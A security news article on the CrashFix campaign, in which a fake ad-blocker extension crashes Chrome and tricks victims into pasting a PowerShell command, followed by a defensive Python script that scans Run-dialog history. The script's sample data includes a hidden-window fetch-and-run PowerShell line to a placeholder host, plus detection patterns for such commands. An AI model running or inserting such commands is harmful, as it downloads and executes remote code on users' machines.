CrashFix – Hackers Using Malicious Extensions to Display Fake Browser Warnings

David Kimber
January 19, 2026

Cybersecurity researchers have recently uncovered a sophisticated malware campaign that employs an unusual, yet remarkably effective, tactic: intentionally crashing users’ web browsers.

The threat, named CrashFix, operates through a malicious Chrome extension disguised as the legitimate ad blocker NexShield.

When users search for privacy tools online, malicious advertisements direct them to download what appears to be a trustworthy extension from Google’s Chrome Web Store.

The fake extension launches a coordinated attack designed to frustrate users into executing dangerous commands.

Fake CrashFix pop-up message (Source – Huntress)

The campaign reveals a multi-layered infection approach targeting both home and corporate networks. Upon installation, the extension remains dormant for the first hour before activating its destructive payload.

This timing strategy creates distance between installation and problems, making it harder for victims to blame their browser troubles on recently added software.

The operation demonstrates careful planning by threat actors who understand user behavior.

Huntress analysts noted that the campaign originates from KongTuke, a tracked threat actor group active since early 2025.

Researchers identified multiple sophisticated components including the NexShield extension mimicking uBlock Origin Lite, the CrashFix attack mechanism, and a previously unknown Python-based remote access tool called ModeloRAT.

Fake CrashFix pop-up message after ‘run scan’ (Source – Huntress)

Corporate targets are treated differently: domain-joined machines receive more powerful malware than standalone systems, which suggests the attackers prioritize enterprise compromises.

The Browser Denial-of-Service Attack Mechanism

At its core, CrashFix relies on a deliberate denial-of-service attack against the victim’s browser. The extension contains code that creates one billion runtime port connections in an infinite loop.

NexShield header reference (Source – Huntress)

Each port consumes memory while the array expands without bound, overwhelming the browser’s internal messaging system and consuming CPU cycles.

Memory usage climbs until system limits are reached, causing severe slowdown, frozen tabs, and complete browser crashes requiring force-quit.

User attempting to look for remediation solutions (Source – Huntress)

When users restart their browser, they encounter a fake security warning claiming the browser “stopped abnormally.” The warning instructs victims to open the Windows Run dialog, paste a command from the clipboard, and press Enter.

Unknown to users, the malicious extension previously copied a PowerShell command to their clipboard. The displayed command appears legitimate but executes a dangerous payload instead.

Attackers intentionally trigger the attack only after establishing C2 connectivity and confirming user interaction with the popup, demonstrating operational awareness.

This combines social engineering with technical exploitation for devastating results.
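Because the lure ends with the victim pasting a command into the Windows Run dialog, responders can check the per-user RunMRU registry key, where Windows keeps Run-dialog history. The following triage sketch is an added example, not code from Huntress or the article; the regex heuristics and the sample values are assumptions constructed for illustration, not indicators from the campaign.

```python
import re
import sys

# Per-user history of commands typed or pasted into the Windows Run dialog (under HKCU).
RUNMRU_KEY = r"Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU"

# Triage heuristics chosen for this example (assumptions, not indicators from the article).
INTERPRETER = re.compile(r"\b(powershell|pwsh|cmd|mshta)(\.exe)?\b", re.I)
RISKY = {
    "hidden window": re.compile(r"\s-w\w*\s+(hidden|1)\b", re.I),
    "encoded command": re.compile(r"\s-(e|ec|enc\w*)\s", re.I),
    "fetch and run": re.compile(r"\b(iex|invoke-expression|irm|iwr|downloadstring)\b", re.I),
}

# Constructed sample of RunMRU values (not taken from the campaign).
SAMPLE = {
    "MRUList": "cab",  # order of value names, most recent first
    "a": "notepad\\1",
    "b": "cmd\\1",
    "c": 'powershell -w hidden -c "iex (irm https://example.invalid/fix)"\\1',
}

def ordered_entries(values):
    """Return Run-dialog commands, most recent first, without the trailing '\\1'."""
    order = values.get("MRUList", "")
    names = [n for n in order if n in values] or sorted(k for k in values if k != "MRUList")
    return [str(values[n]).removesuffix("\\1") for n in names]

def triage(values):
    """Flag entries that launch an interpreter and list the risky traits each shows."""
    findings = []
    for cmd in ordered_entries(values):
        if INTERPRETER.search(cmd):
            traits = [name for name, rx in RISKY.items() if rx.search(cmd)]
            findings.append((cmd, traits))
    return findings

def read_runmru():
    """Load the current user's RunMRU values from the registry (Windows only)."""
    import winreg
    with winreg.OpenKey(winreg.HKEY_CURRENT_USER, RUNMRU_KEY) as key:
        count = winreg.QueryInfoKey(key)[1]  # number of values under the key
        return {n: d for n, d, _ in (winreg.EnumValue(key, i) for i in range(count))}

if __name__ == "__main__":
    data = read_runmru() if sys.platform == "win32" else SAMPLE
    for cmd, traits in triage(data):
        print(f"[{', '.join(traits) or 'interpreter only'}] {cmd}")
```

A hit is only a starting point for review: administrators legitimately launch `cmd` or PowerShell from the Run dialog, so the flagged traits matter more than the interpreter match alone.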
